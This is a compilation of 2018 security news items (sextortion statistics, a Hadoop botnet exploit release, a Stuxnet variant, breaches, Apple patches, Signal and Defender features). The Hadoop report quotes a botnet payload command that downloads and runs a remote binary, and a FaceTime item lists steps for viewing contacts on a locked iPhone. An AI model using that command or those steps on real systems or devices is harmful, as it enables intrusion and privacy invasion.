“Talos extracted all messages from these two sextortion campaigns that were received by SpamCop from Aug. 30, 2018 through Oct. 26, 2018 — 58 days’ worth of spam.” reads the analysis published by Talos.

“Every message sent as a part of these two sextortion campaigns contains a From: header matching one of the following two regular expressions:

From =~ /Aaron\d{3}Smith@yahoo\.jp/
From =~ /Aaron@Smith\d{3}\.edu/ “

In total, SpamCop received 233,236 sextortion emails related to these “Aaron Smith” sextortion campaigns. The messages were transmitted from 137,606 unique IP addresses. The vast majority of the sending IP addresses, 120,659 sender IPs (87.7 percent), sent two or fewer messages as a part of this campaign. “

sextortion campaigns

Top countries sending sextortion emails include Vietnam (15.9 percent), Russia (15.7 percent), India (8.5 percent), Indonesia (4.9 percent) and Kazakhstan (4.7 percent). I

According to Talos, the number of distinct email addresses targeted in the campaigns was 15,826, each recipient receiving on average a 15 sextortion messages. In just one case, a recipient received 354 messages.

Each sextortion spam message includes a payment demand that randomly varies from $1,000 up to $7,000.

“These six different payment amounts appear with almost identical frequency across the entire set of emails, suggesting that there was no effort made on the part of the attackers to tailor their payment demands to individual victims.” continues Talos.

Researchers discovered that about 1,000 sending IP addresses used in the Aaron Smith campaigns were also involved in another sextortion campaign analyzed by experts from IBM X-Force in September and that leveraged the Necurs botnet too.

The campaigns allowed crooks to earn a total of 23.3653711 bitcoins (roughly $146,380.31), the bitcoins were distributed across 58,611 unique bitcoin wallet addresses.

Only 83 of these wallets had active balances, in some cases the wallets received payments smaller than $1,000, a circumstance that suggests they were used in other spam campaigns.

“Most anti-spam solutions will filter out obvious sextortion attempts like the ones we highlighted in this post. However, that is no silver bullet. When these kinds of spam campaigns make it into users’ email inboxes, many of them may not be educated enough to identify that it’s a scam designed to make them give away their bitcoins.” concludes Talos.

“Unfortunately, it is clear from the large amount of bitcoin these actors secured that there is still a long way to go in terms of educating potential victims.”

Further technical details and IoCs are included in the analysis published by Talos.

0x20k of Ghost Squad Hackers Releases ODay Exploit Targeting Apache Hadoop
1.11.2019 securityaffairs

0x20k of Ghost Squad Hackers has released the full source code of the 0day exploit used to targeting Apache Hadoop and build the FICORA Botnet.
In direct response to the publication of Radware’s analysis of the new discovery of the DemonBot malware strain effecting Hadoop clusters earlier the week, October 25th, 2018, 0x20k of Ghost Squad Hackers has released the full source code of the 0day exploit used to build his newest model; the FICORA Botnet. 0x20k, who is also credited as the author of the Yasaku Botnet, is a co-author of the 0day exploit provided below.

Unlike DemonBot which is credited with infecting 70 servers to date, 20k claims to have infected over 1,000 with the potential for pulling over 350 GBPS – verified through Voxility.

Hadoop DemonBot malware

According to 20k, also known as URHARMFUL, the author of now infamous DemonBot Malware strain got his source code from one of the authors of Owari and stole it off his servers before dumping it online in September 2018. In this way DemonBot’s “accolades” are going to the wrong person, which is why 20k has decided to release his exploit in the wild to verify ownership before anyone tries to steal it away from him. 20k has also released several videos of him testing out various attacks on different servers and services, including OVH, NFO, ProxyPipe, and Mineplex – allegedly pulling anywhere from 110 GBPS to 200 GBPS.

In terms of how the two bots operate, they are extremely different. For example, DemonBot infects through port 6982 on either 22 or 23 depending on the availability of Python or Perl and telnetd on the device/server.

Whereas FICORA infects through Port 8088. On Demonbot, the DDoS attack vectors supported by are UDP and TCP floods, whereas FICORA utilizes URG Flood on TCP /32. Moreover, DemonBot is just a renamed version of Lizkebab, whereas FICORA is similar to Mirai – but has different functions.

Hadoop DemonBot malware exploit

Full 0Day Exploit:

Rogue Security Labs has reached out to several of the affected services to confirm the validity of the attacks. While OVH declined to comment on the matter, John aka Edge100x, President and CEO of NFO confirmed each and every attack targeting their servers – of which there were 3. ProxyPipe, on the other hand, took a defensive stance to my emails, claiming that their servers have never been crashed, and that the company has never seen anything near 200 GBPS.

In response to the DoS attack faced by NFO, John said “The 110 Gbps number is likely from our website https://www.nfoservers.com/networklocations.php” – which it was. Adding that “It is common for attackers to reference that site and assume that they generated that much traffic when they are able to trigger a null-route, though that’s not what it actually means.” He did not confirm or deny whether or not the FICORA botnet could pull that sort of traffic, he just claims hitting the IP’s listed on YouTube wouldn’t necessarily provide the Botnet owner with an accurate reading of the traffic generated. Though he said those IP’s certainly were crashed on the selected dates.

How The Exploit Works:
Upon analysis, Steve Loughran, a software developer specializing in Apache Hadoop, told Rogue Security that “If this is happening on a YARN cluster where Kerberos is enabled, then somehow there’s a weakness in the YARN REST API where SPNEGO-authenticated verification of caller identity has failed. This is something we can look at and address. Or it could be something is playing with default passwords for management tools and using that to gain permission.” Explaining that “It’s as if the cluster had telnet or rlogin enabled without password checks.”

However, as 20k explains “FICORA contains telnet, ssh and hadoop servers.” For telnet they “used dictionary style brute-force, same as ssh, hadoop pulled the biggest amount of packets.” 20k added that it was a Remote Code Execution bug that allowed him to execute x86 binary in Hadoop’s directory /tmp.

So the payload was basically cd /tmp; wget http://botet.server/x86; chmod 777 x86; ./x86 hadoop.x86

Perhaps most importantly, as 20k even explains in the release of the exploit “we already bricked this exploit so good luck on pulling them.” For Hadoop developers this is particularly troubling. According to Mr. Loughran, all Apache can do for this problem is “issue advisories for clusters to turn on Kerberos.” Adding that “For this particular cluster, turning off the YARN API may break things, but if the malware depends on its existence (and known HTTP port), reset this property in yarn-site.xml to its default value, false.”

Image may contain: text

“That may temporarily slow it down —albeit at the risk of breaking apps which depend on it— but if the malware can issue Hadoop RPC calls to YARN it can still submit work, or, as the HDFS filesystem will be equally unprotected, come in via the FS.”

Based on the script, Loughran notes that the exploit “isn’t a remote code execution bug, it is a remote job submission.” As of today, 10/31/2018, Apache is actively trying to figure “if there’s some actual exploit of the Hadoop REST APIs even when security is enabled, or whether this is a case of a Hadoop cluster without security turned on is running somebody else’s code.” No known patch for the exploit is known to exist, and even as Mr. Loughran even admits, considering that the exploit utilizes ssh ports to run Brute-Force Dictionary Attacks running on foundational Linux servers, the fix is potentially “out of our scope.”

With that said, however, developers at Hadoop claim that the exploit listed above is “not a zero-day exploit.” More likely, they say, it is “an attack which schedules work on unsecured Hadoop clusters visible on the network. ” With that said, however, even Loughran can’t figure out how the code exactly works or compromises devices, saying “it may be that there is a real vulnerability in systems with Kerberos enabled. if that turns out to be the case, yes, that’s a 0-day.”

The fix for now he says? “turn security on, don’t make your systems visible on the internet. indeed, keep in a private subnet with restricted access, if at all possible.”

Iran hit by a more aggressive and sophisticated Stuxnet version
1.11.2019 securityaffairs

Iran’s strategic network was hit by a new destructive and sophisticated version of the Stuxnet cyber weapon, the Hadashot TV reports.
According to the Hadashot TV, Iran’s strategic network was hit by a destructive malware-based attack hours after Israel revealed the Mossad had thwarted an Iranian murder plot in Denmark, and days after Iran’s President Hassan Rouhani’s phone was tapped.

Attackers used a malware similar to Stuxnet, the cyber weapon that hit the Iranian nuclear plant at Natanz in 2010 interfering with nuclear program of the Government of Teheran.

“Remember Stuxnet, the virus that penetrated the computers of the Iranian nuclear industry?” reported Hadashot TV.

“Iran has admitted in the past few days that it is again facing a similar attack, from a more violent, more advanced and more sophisticated virus than before, that has hit infrastructure and strategic networks.”

Stuxnet is the product of a joint operation conducted by the US and Israeli intelligence agencies along with the alleged help of GCHQ.

The malicious code used in the recent attacks is “more violent, more advanced and more sophisticated,” and Iran blames Israel for the offensive.

The Israeli officials are not commenting on the attack, in recent months the Mossad intelligence agency conducted several operations against Iran. Early this year the cyberspies smuggled a huge trove of documents (paper and digital files) detailing Iran’s clandestine nuclear weapons program out of the Islamic Republic with Iranian agents.”

In September, Prime Minister Benjamin Netanyahu provided at the UN the alleged details about the activity of the Iranian Government’s nuclear inside Iran, in Syria, and in Lebanon.Stuxnet

A few days ago, Gholamreza Jalali, the head of Iran’s civil defense agency confirmed that government experts have uncovered and neutralized a new strain of Stuxnet

“Recently we discovered a new generation of Stuxnet which consisted of several parts … and was trying to enter our systems,” Jalali was quoted as saying by the semi-official ISNA news agency at a news conference marking Iran’s civil defense day.

Iran’s Supreme Leader Ayatollah Ali Khamenei calls for action against the intensified efforts of Iran’s enemies in “infiltrating” his country.

“In the face of the enemy’s complex practices, our civil defense should … confront infiltration through scientific, accurate, and up-to-date … action,” Ayatollah Khamenei told civil defense officials, who are in charge of areas including cyber defense.

85 Millions of voter records available for sale ahead of the 2018 US Midterm Elections
1.11.2019 securityaffairs

Ahead of the 2018 US midterm elections, sellers are flooding the cybercrime underground markets with data from voter databases.
Experts at cybersecurity company Carbon Black found tens of different state voter databases available for sale on the dark web.

“Carbon Black researchers found 20 different state voter databases available for purchase on the dark web, several from swing states.” reads the report published by Carbon Black.

“Critical information in these offerings included voter IDs, full names, current / previous addresses, genders, phone numbers and citizenship status, among other information.”

US midterm elections voter databases 2

The availability of such kind of data exposes voters to sophisticated identity theft. Experts discovered data related to more than 81,534,624 voters from 20 states. Most of the records belong to New York, 15 million voters, and Florida, 12.5 million, and are available for sale since September 1.

US midterm elections

Experts warn of the availability in the Dark Web of information and commodities that could be used to interfere with elections.

“Thousands of Instagram followers, Facebook likes, YouTube views and Twitter retweets are available for a small amount of cryptocurrency on the dark web. Some listings focus on selling “laser-focused” ads to make sure a message gets across to the recipients — most likely to respond to a campaign.” continues the report.

“Manipulating social media is a relatively low-cost endeavor, and hackers on the dark web appear to have tools at the ready for manipulating public opinion on major American platforms.”

Experts also discovered many hackers and hacking crews for hire that offer to target government organizations for several malicious purposes.

“Some of the hackers and hacking teams “offer to target government entities for the purposes of database manipulation, economic/corporate espionage, DDoS attacks, and botnet rentals.” states the report.

These services have a varying price that goes from hundreds to thousands of dollars per target.

According to the firm, election-focused cyberattacks pose real threats to Western political institutions. Sixtyeight percent of survey respondents, among the top cybersecurity professionals in the world, believe the upcoming US midterm elections will be influenced by cyberattacks.

Cyber attacks carried out by nation-state actors are even more sophisticated, state-sponsored hackers are looking to political propaganda operations, such as the 2016 Democratic National Committee hack.
Let me close with an alarming figure from the survey conducted by Carbon Black, “1 in 4 voters said they will consider not voting in future elections over cybersecurity fears.”

The Radisson Hotel Group has suffered a data breach
1.11.2019 securityaffairs

The hotel chain Radisson Hotel Group suffered a security breach that exposed personal information of the members of its loyalty scheme.
The hotel chain Radisson Hotel Group suffered a security breach that exposed personal information (name, address (including country of residence), email address, and in some cases, company name, phone number, Radisson Rewards member number, and any frequent flier numbers on file) of the members of its loyalty scheme.

The incident has happened on September 11, but the IT staff at the Radisson Hotel Group identified it only on October first. The staff promptly locked out the intruders once discovered the data breach.

The hotel chain Radisson Hotel Group is present in 73 countries and owns several brands including the Radisson, Radisson Blu, Radisson Red, Country Inns and Suites by Radisson and Park Inn by Raddison.

The company notified the security breach to the holders of the Radisson Rewards cards only yesterday.

Payment info and passwords were exposed due to the incident.

According to the data breach notification email sent by the Radisson Hotel Group the security breach affected only a “small percentage” of the Radisson Rewards members.

Radisson Rewards-breach
Source Boarding Area website

“All impacted members accounts have been secured, and flagged to monitor or any potential unauthorised behaviour. While the ongoing risk to your Raddison Rewards account is low, please monitor your account for any suspicious activity.” reads the data breach notification.

“Radisson Rewards takes this incident cry seriously and is conducting an ongoing extensive investigation into the incident to help prevent data privacy incidents from happening again in the future.”

At the time of writing, there are no technical details about the data breach.

“The data security incident impacted less than 10 percent of Radisson Rewards member accounts,” a Radisson spokesman told ElReg.

Cardholders should be cautious about potential scams carried out by cybercriminals in possession of the stolen data.

UK Regulator Issues Second GDPR Enforcement Notice on Canadian Firm
31.10.2019 securityweek

On 6 July 2018, the UK's data protection regulator (ICO) issued the first GDPR-related enforcement notice. It was delivered on Canadian firm Aggregate IQ. The notice comments, "The Commissioner has observed with concern the application of techniques hitherto reserved for commercial behavioural advertising being applied to political campaigning, during recent elections and the EU referendum campaign in 2016."

That enforcement notice requires that AIQ should within 30 days "Cease processing any personal data of UK or EU citizens obtained from UK political organisations or otherwise for the purposes of data analytics, political campaigning or any other advertising purposes."

AIQ appealed the notice. In that appeal, AIQ states "the data continues to be held by AggregateIQ for the simple reason that it remains subject to a preservation order made by Canadian officials."

In reality there is no conflict between preserving the data for the Canadian officials and ceasing to process it for the stated purposes. Nevertheless, it seems to have alerted the ICO to the need to account for separate simultaneous legal requirements in different jurisdictions. The ICO has now issued a new enforcement notice (PDF) that "varies and replaces the Notice served on AIQ dated 6 July 2018. The Notice clarifies the steps to be taken by AIQ..."

The requirements of the new notice (two short paragraphs replacing one short paragraph) are effectively the only difference between the two notices.

"AIQ appealed the issue of the Notice on a number of grounds, one of which was the apparent lack of precision as to what AIQ would have to do to comply and also the fact that AIQ was subject to a requirement of the Office of Information and Privacy Commissioner [OIPC] of British Columbia not to destroy data," explains David Flint, senior partner at MacRoberts LLP.

The new requirements include oblique reference to the investigation by the ICO's Canadian counterpart (OIPC) and the Canadian preservation order already on AIQ. The terms must now be acted upon within 30 days of the OIPC "notifying (AIQ) that it is no longer the subject of any investigation by the OIPC, or that the OIPC is content for it to comply with this Notice."

The action required is also slightly different. "Erase any personal data of individuals in the UK, determined by reference to the domain name of the email addresses processed by AIQ, retained on its servers as notified to the Information Commissioner..."

But, comments Flint, "Given that the October Notice states in paragraph 2 that it "clarifies the steps to be taken by AIQ", some lack of clarity remains. What is to happen to the personal data of non-UK data subjects mentioned in the July Notice? What about UK data subjects who have e-mail addresses other than ".co.uk" -- such as outlook.com? Does the "clarification" go beyond the original Notice which had a purpose restriction on the use of the data -- the October Notice seems to be all encompassing."

In short, he adds, "the October Notice may provide some "clarification" but really raises as many questions as it answers."

U.S. Accuses China of Hacking Aerospace, Tech Companies
31.10.2019 securityweek

Chinese intelligence officers recruited hackers and insiders to help them steal sensitive information from aerospace and technology companies, the U.S. Department of Justice said on Tuesday.

An indictment unsealed this week charges ten Chinese nationals over their role in the scheme, including two spies, six hackers and two insiders.

According to U.S. authorities, the operation was coordinated by Zha Rong and Chai Meng, intelligence officers working for the Jiangsu Province Ministry of State Security (JSSD) in the Chinese city of Nanjing. The JSSD is a foreign intelligence arm of China’s Ministry of State Security (MSS), which is responsible for non-military foreign intelligence, domestic counterintelligence, and political and domestic security.

Zha Rong and Chai Meng are said to have recruited five hackers, including Zhang Zhang-Gui, Liu Chunliang, Gao Hong Kun, Zhuang Xiaowei, and Ma Zhiqi, to steal information on a turbofan engine used in commercial airliners in Europe and the United States.

The targeted jet engine was being developed by a French aerospace company, which also had offices in China’s Jiangsu province, in cooperation with a U.S.-based firm.

The hackers targeted the French company via phishing, watering hole attacks, and domain hijacking, but they were also assisted by at least two individuals working at the firm’s Chinese office. Tian Xi allegedly planted a piece of malware received from a JSSD officer on the organization’s computers and Gu Gen, who had been working as the head of IT and security, tipped off the Chinese agency when foreign law enforcement discovered the malware.

In addition to the French aerospace manufacturer, the hackers targeted companies that built parts of the jet engine, including ones based on Massachusetts, Oregon and Arizona. Authorities pointed out that at the time of the attacks, which spanned from at least January 2010 to May 2015, an aerospace company owned by the Chinese government had also been working on a similar engine.

One of the alleged hackers, Zhang Zhang-Gui, has also been accused of working with an individual named Li Xiao as part of a separate hacking operation conducted “for their own criminal ends.” The Justice Department said one of the victims of this attack was a tech company in San Diego from which the hackers attempted to steal commercial information and use its website for a watering hole attack.

The first cyberattack known to U.S. authorities targeted Los Angeles-based Capstone Turbine. The attackers attempted to steal data from the company and use its website as a watering hole.

This is the third round of charges brought against JSSD spies since September. One JSSD officer was extradited to the United States for attempting to steal trade secrets related to jet engines and a U.S. Army recruit was indicted in September for working with a JSSD intelligence officer. None of the individuals targeted in the newly unsealed indictment are in U.S. custody.

“State-sponsored hacking is a direct threat to our national security. This action is yet another example of criminal efforts by the MSS to facilitate the theft of private data for China’s commercial gain,” said U.S. Attorney Adam Braverman. “The concerted effort to steal, rather than simply purchase, commercially available products should offend every company that invests talent, energy, and shareholder money into the development of products.”

Apple Patches Passcode Bypass, FaceTime Flaws in iOS
31.10.2019 securityweek

Security updates released by Apple on Tuesday for its macOS, iOS, tvOS, watchOS, Safari, iCloud and iTunes products address tens of new vulnerabilities.

The advisory published by Apple for macOS lists over 70 CVE identifiers. This includes vulnerabilities affecting third-party components and flaws that were previously addressed by Apple and for which patches were now backported to older versions of the operating system.

The security holes patched this week can be exploited for arbitrary code execution, privilege escalation, information leakage, and denial-of-service (DoS) attacks.

The more interesting vulnerabilities include a crypto issue discovered by a team of researchers from two universities, flaws that allow applications to execute code with elevated privileges, and a user interface spoofing bug in the Mail app. The latest updates for macOS 10.14 Mojave also patch Variant 3a of the speculative execution bugs known as Spectre and Meltdown, and some vulnerabilities discovered by researcher Patrick Wardle, including one disclosed shortly after the launch of Mojave.

Apple has also patched over 20 vulnerabilities in iOS 12. This includes several FaceTime issues discovered by Natalie Silvanovich of Google Project Zero. The researcher found four memory corruptions that could result in data leaks or arbitrary code execution. Some of these flaws allow a remote attacker to execute code by initiating a FaceTime call, Apple said.

iOS 12.1 also resolves two lockscreen bypass vulnerabilities disclosed recently by Jose Rodriguez, known for his YouTube channel videosdebarraquito. Rodriguez found that the passcode can be bypassed on an iPhone by leveraging the VoiceOver (CVE-2018-4387) and Notes (CVE-2018-4388) features. The researcher discovered these weaknesses just days after Apple released patches for similar passcode bypass methods that he had previously found.

Many of the iOS vulnerabilities were also patched by Apple in tvOS and watchOS, both of which are based on the mobile operating system. Some of the flaws were also found to impact Safari and the iTunes and iCloud applications for Windows.

Code analysis firm Semmle on Tuesday disclosed the details of a code execution vulnerability discovered by one of its researchers. Apple first fixed the bug in September with the release of iOS 12 and macOS Mojave, but this week it also backported the patches to macOS Sierra and High Sierra.

Ex-Air Force Airman in New Mexico Accused of Computer Fraud
31.10.2019 securityweek

Prosecutors say a former Air Force airman in New Mexico could be facing up to 10 years in federal prison for computer fraud.

Michael Weber made his initial court appearance Tuesday in Albuquerque.

He remains in federal custody pending Wednesday's preliminary hearing and detention hearing.

Authorities say the 22-year-old Weber was arrested Tuesday morning by FBI agents at a home in Alamogordo.

According to a criminal complaint, Weber allegedly placed a program, information, code or command known as a "spam bot" onto a government-issued cellular phone assigned to his supervisor at Cannon Air Force Base on Jan. 16.

The "spam bot" allegedly caused the cellular phone to receive a long string of messages allegedly intended to cause damage to it.

Proposal for Cybersecurity Civilian Corps Gets Mixed Reception
31.10.2019 securityweek

Although the U.S has been engaged in cybersecurity for over a generation, "there continues to be organizational and human gaps that leave the nation insecure." Few people would disagree. What is less clear is any realistic and effective solution to the problem.

Now the bi-partisan New America think tank, based in Washington D.C. with additional offices in New York City and Oakland, has put forward its own proposal. A new paper, 'The Need for C3 -- A Proposal for a United States Cybersecurity Civilian Corps' (PDF), recommends the formation of a 25,000-strong volunteer force of cybersecurity personnel to cover the whole United States.

Its purpose would be to engage the wider cybersecurity community to tackle core needs that are unlikely to be met through existing structures, thereby improving the overall security ecosystem through three key areas: education and outreach; testing, assessments and exercises; and on-call expertise and emergency response (a sort of cybersecurity parachute brigade).

Although the corps would be populated by unpaid volunteers, it would still need to be enshrined in legislation. Here, New America sees it as an extension and replacement for NETGuard. A National Emergency Technology Guard was included in the Homeland Security Act of 2002. "Due to DHS disorganization and disinterest at the time, the NETGuard did not launch, leaving the nation with the gap discussed above," says the paper. Nevertheless, NETguard could be used as a starting and reference point for the proposed U.S. Cyber Civilian Corps (C3) -- and it should remain under the organizational purview of the DHS.

"Given awareness of both the threats to our nation's cyber posture, as well as the skills shortage, we're at the point where we must try novel approaches," comments David Ginsburg, VP of marketing at Cavirin. "An advantage of a grass-roots effort like the Cyber Civilian Corps would provide local resources and skills if we were in a situation where 'primary responders' were overstretched."

There is little doubt that the basic idea is good -- the main question is whether it is workable. The paper's authors maintain throughout that it is indeed workable, and cite numerous existing volunteer organizations as examples -- such as the 788,250 volunteer firefighters. "They donate their time as a public service," say the authors; "similarly, citizens with a different skill set could work on cybersecurity programs that affect their communities."

But cybersecurity is already a profession in staffing crisis. "There are just under 300,000 open cybersecurity positions in the United States at this time which companies and government are unable to fill," admit the authors; "future needs project as high as one million unfilled positions."

With a small degree of circular argument, finding 25,000 volunteers in an already overstretched workforce is expected to help reduce the overall staff shortage over time. It may -- but gaining enough initial volunteers is going to be difficult. Michigan already has a state-level C3 (unsurprisingly known as MiC3). New America acknowledges that MiC3 is "part inspiration for the national concept," but notes that activation requires a governor-declared state of emergency that has never occurred.

MiC3 was formed in 2013, and draws its members from local companies, universities and civil society. It is open to any Michigan state resident with 2 years infosec involvement, can "demonstrate basic knowledge of networking and security concepts, as well as basic IR and forensics skills," and has employer support. In the five years of its existence it has grown to approximately 100 members -- which makes the average 500 members per state envisaged by New America appear somewhat ambitious.

Industry opinion on the value of New America's proposal varies widely. "The proposal for a United States Cybersecurity Civilian Corps is a great idea," comments Joseph Carson, chief security scientist at Thycotic, "and has been something that has been done in Estonia for many years with the 'kaitseliit', also known as the Cyber Defense League. It is a voluntary organization that brings together experts from both military and the corporate world to practice and prepare to defend the country when attacked. Countries are being attacked by cyberattacks more often than ever before today, so it is more important than ever to be prepared."

Nathan Wenzler, chief security strategist at AsTech, takes an opposing view. "The call for a Cybersecurity Civilian Corps seems like an entirely misguided approach to addressing the various issues we face as a society -- including the lack of qualified, well-trained and experienced security professionals that most organizations deal with while trying to defend against a seemingly endless number of attacks from malicious entities."

He points out that most companies are already pushing their understaffed security teams to work more than the typical 40-hour week just to keep up with their own needs. "There's not a lot of hours left in the day to expect that these folks would volunteer their time to participate in this proposed Corps," he told SecurityWeek.

New America suggests that the Corps would just need a federal budget of $50 million to get started. "This budget would go towards the purchase of devices, training materials, software licenses, and office space." It justifies the budget by noting that NotPetya ransomware outbreak cost FedEx $400 million, and Merck $670 million.

"If a cyber corps is able to prevent just a few of these breaches and/or mitigate their damage and costs," suggests New America, "especially through its relatively cheap supplementary volunteer model, the investment will more than pay itself off in both economic and national security terms."

It is unlikely that a volunteer force will be any more capable than the existing FedE x and Merck security teams -- but collaboration and intelligence sharing between members of the Corp could potentially provide an early warning system. But Wenzler is concerned that the concept could be abused. Firstly, he wonders, "If materials are being provided, would that come in the form of computers and free Internet access and software licenses to security tools? If so, you may find a lot of people signing up just to get these free items, but be unwilling or unable to volunteer the kind of quality services that would be expected."

Secondly, he wonders if the Corps itself would become a target. "What if this corps was given access to a central database or network that connects all the other participants so they could collaborate? Seems like a valuable target for most aggressor nation-states to want to join in and monitor so that they can better understand what they're up against when potentially attacking U.S. organizations."

Overall, the consensus seems to be that New America's proposal is an interesting, but unworkable idea. Carson believes it is aimed at the wrong level of participant. "I don't believe this is realistic as it is a voluntary service," he told SecurityWeek, "and you want to influence the right professionals to participate so it must be focused on seasoned professionals who can cooperate with government officials with a common goal on protecting civilians from cyber-attacks."

"All in all, it's a noble idea," said Wenzler, "but not a particularly useful or clever way to make better use of the limited number of people and the ever-shrinking amount of time they have to contribute their expertise for the betterment of society as a whole. We're already doing that, and efforts like this Cybersecurity Civilian Corps would be better served by supporting the groups and organizations out there who are already fulfilling this purpose."

iOS Lockscreen Bypass Abuses New Group FaceTime Feature
31.10.2019 securityweek

Just hours after Apple announced the availability of a new FaceTime feature in iOS, iPhone enthusiast Jose Rodriguez, known for his YouTube channel videosdebarraquito, found a way to bypass a device’s lockscreen by abusing the newly introduced functionality.

With the release of iOS 12.1, Apple rolled out a new feature called Group FaceTime, which allows users to add other people to their ongoing FaceTime call.

While the feature may be useful for many people, Rodriguez quickly discovered that it can be abused to bypass the passcode on iPhones and gain access to contact information saved on a device.

The hack is easy to carry out and it’s very reliable, unlike other methods discovered by Rodriguez recently, which involved tens of steps and often required multiple attempts to complete.

The attack starts with a phone call to or from the targeted device – Siri can be used to make a phone call to someone in the address book or a specified phone number. If the calling/called device has FaceTime, the hacker can switch the call to FaceTime and then select the “Add Person” option associated with the newly introduced group feature.

The device will prompt the attacker to select someone from the address book. While only contact names are displayed initially, the attacker can use 3D Touch – the feature that allows the device to distinguish between different levels of force being applied to the screen – to obtain additional information for each contact.

In the past years, Rodriguez identified numerous methods to bypass an iPhone’s lockscreen and gain access to contacts and photos stored on a device.

He recently discovered several methods involving Siri and the VoiceOver accessibility feature. Apple has made multiple attempts to patch the bugs after Rodriguez found new variations. The most recent patch came on Tuesday, when Apple released iOS 12.1, but it’s clear that the hacker is very resourceful.

While some of these passcode bypass methods were patched with regular updates, Apple also rolled out iOS updates specifically to address Rodriguez’s hacks.

Signal Unveils New 'Sealed Sender' Feature
31.10.2019 securityweek

Open Whisper Systems on Monday announced that the latest beta version of the Signal messaging app includes a new feature that aims to protect the identity of the sender.

Signal uses end-to-end encryption to protect messages and it avoids storing data such as contacts, conversations, locations, avatars, profile names, and group details. However, current stable versions do rely on the service knowing where a message comes from and where it’s going.

Signal developers hope to further reduce the amount of data accessible to the messaging service with a new feature, named “sealed sender,” that eliminates the need to know who the sender is.Signal launches Sealed Sender

The application’s developers noted that when the Signal client authenticates on the service it needs to validate the sender’s identity in order to prevent spoofing. The sender’s identity is also important for rate limiting and abuse prevention mechanisms.

The implementation of “sealed sender” meant that Open Whisper Systems had to come up with an alternative to these functions. The first issue was addressed by having the client periodically fetch a short-lived sender certificate that contains the user’s phone number and public identity key. By including this certificate in sent messages, receiving clients can easily check its validity and verify the sender’s identity.

As for abuse prevention, Signal developers have decided that an efficient alternative would be to use 96-bit delivery tokens derived by clients from the profile key. The tokens are registered with the service and clients are required to prove knowledge of the token when sending “sealed sender” messages.

“Since knowledge of a user’s profile key is necessary in order to derive that user’s delivery token, this restricts ‘sealed sender’ messages to contacts who are less likely to require rate limits and other abuse protection. Additionally, blocking a user who has access to a profile key will trigger a profile key rotation,” Signal’s Joshua Lund wrote in a blog post.

Users also have the option to allow anyone (i.e., people not in their contact list) to send “sealed sender” messages. However, Signal warned that this increases the risk of abuse.

Once the feature is rolled out to all users, messages will automatically be sent out without giving away the sender’s identity, at least whenever possible. In the meantime, “sealed sender” can be tested by installing the latest beta release.

“These protocol changes are an incremental step, and we are continuing to work on improvements to Signal’s metadata resistance. In particular, additional resistance to traffic correlation via timing attacks and IP addresses are areas of ongoing development,” explained Lund.

Open Whisper Systems has made significant improvements to Signal over the past years, but researchers have also discovered potentially serious security issues in the messaging service, including code execution vulnerabilities, failure to delete messages from devices, and bugs that could have been exploited to alter attachments.

A few hours after Apple released iOS 12.1, a researcher presented a Passcode Bypass issue
31.10.2019 securityaffairs

A few hours after Apple released iOS 12.1 the iPhone bug hunter Jose Rodriguez has found a new passcode bypass issue that could be exploited to see all contacts’ private information on a locked iPhone.
“Jose Rodriguez, a Spanish security researcher, contacted The Hacker News and confirmed that he discovered an iPhone passcode bypass bug in the latest version of its iOS mobile operating system, iOS 12.1, released by Apple today.” reads a post published by THN.

Like other passcode bypass flaws discovered by the researcher also this one is very simple to exploit.

Rodriguez published a video PoC that show how the passcode bypass works.

The flaw resides in the new feature Group FaceTime that was implemented with iOS 12.1 and that allows users to video chat with up to 32 people simultaneously and supports stickers, video filters, and Animoji/Memoji.
The new passcode bypass attack doesn’t leverage on Siri or VoiceOver screen reader feature enabled on a target iPhone.

Below the procedure Rodriguez has shown to THN:
Call the target iPhone from any other iPhone (if you don’t know the target’s phone number, you can ask Siri “who I am,” or ask Siri to make a call to your phone number digit by digit), or use Siri to call on your own iPhone.
As soon as the call connects, initiate the “Facetime” video call from the same screen.
Now go to the bottom right menu and select “Add Person.”
Press the plus icon (+) to access the complete contact list of the targeted iPhone, and by doing 3D Touch on each contact, you can see more information.
“In a passcode-locked iPhone with latest iOS released today Tuesday, you receive a phone call, or you ask Siri make a phone call (can be digit by digit), and, by changing the call to FaceTime you can access to the contact list while adding more people to the Group FaceTime, and by doing 3D Touch on each contact you can see more contact information,” Rodriguez told The Hacker News.

Also, it should be noted that since the attack utilizes Apple’s Facetime, the hack would only work if the devices involved in the process are iPhones.

The new passcode bypass works on all current iPhone model, including the latest iPhone X and XS devices, running the latest version of the Apple mobile operating system.
Unfortunately, at the time, there is no workaround to address the issue.

Rodriguez has recently other similar issued in Apple devices, in October he first discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could have been exploited to access photos, contacts on a locked iPhone XS.

The researcher also disclosed a new passcode bypass flaw that could have been exploited to access photos and contacts on a locked iPhone XS.

Windows Defender is the first antivirus solution that can run in a sandbox
31.10.2019 securityaffairs

Windows Defender, the Windows built-in anti-malware tool, implemented the ability to run in a secure sandbox mode.
The mechanisms allow detonating an application in a safe environment that is isolated from the operating system and other applications. This means that even if the application is compromised it will not affect the overall system if it hasn’t implemented sandbox escaping mechanisms.

Since antivirus and anti-malware tools run with the highest level of privileges to scan all parts of a computer for malicious code, it has become a desired target for attackers.

This is probably the first case of a sandbox mechanism implemented for an antivirus solution that aims at protecting the Windows systems if it is compromised.
In the past, several vulnerabilities were discovered in popular antivirus solutions (i.e. ESET, Symantec, AVG, McAffee, Kaspersky, MalwareBytes) that could have been exploited to compromise the host.

Microsoft has decided to implement additional security measures introducing the sandbox mode to the Windows Defender.

Experts pointed out that implementing sandboxing in Windows Defender was not simply due to the possible impact on the performance of the system.

“Security researchers both inside and outside of Microsoft have previously identified ways that an attacker can take advantage of vulnerabilities in Windows Defender Antivirus’ content parsers that could enable arbitrary code execution.” Microsoft said in a blog post.

“Running Windows Defender Antivirus in a sandbox ensures that in the unlikely event of a compromise, malicious actions are limited to the isolated environment, protecting the rest of the system from harm.”

Popular Google Project Zero White hat hacker Tavis Ormandy praised Microsoft choice to gets Secure Sandbox Mode.

Tavis Ormandy

Wow, this is amazing. Congratulations to the team, this is game changing.

Tanmay Ganacharya
📢 Windows Defender Antivirus can now run in a sandbox! 📢
💥 First complete AV solution to have this capability 💥

This is a direct result of feedback that we received from the security industry. We encourage you to try this feature & give us feedback.https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/ …

View image on Twitter
6:39 PM - Oct 26, 2018
226 people are talking about this
Twitter Ads info and privacy
Currently, the Windows Defender running on Windows 10, version 1703 or later, supports the sandbox mechanism, but users have to explicitly enable it.

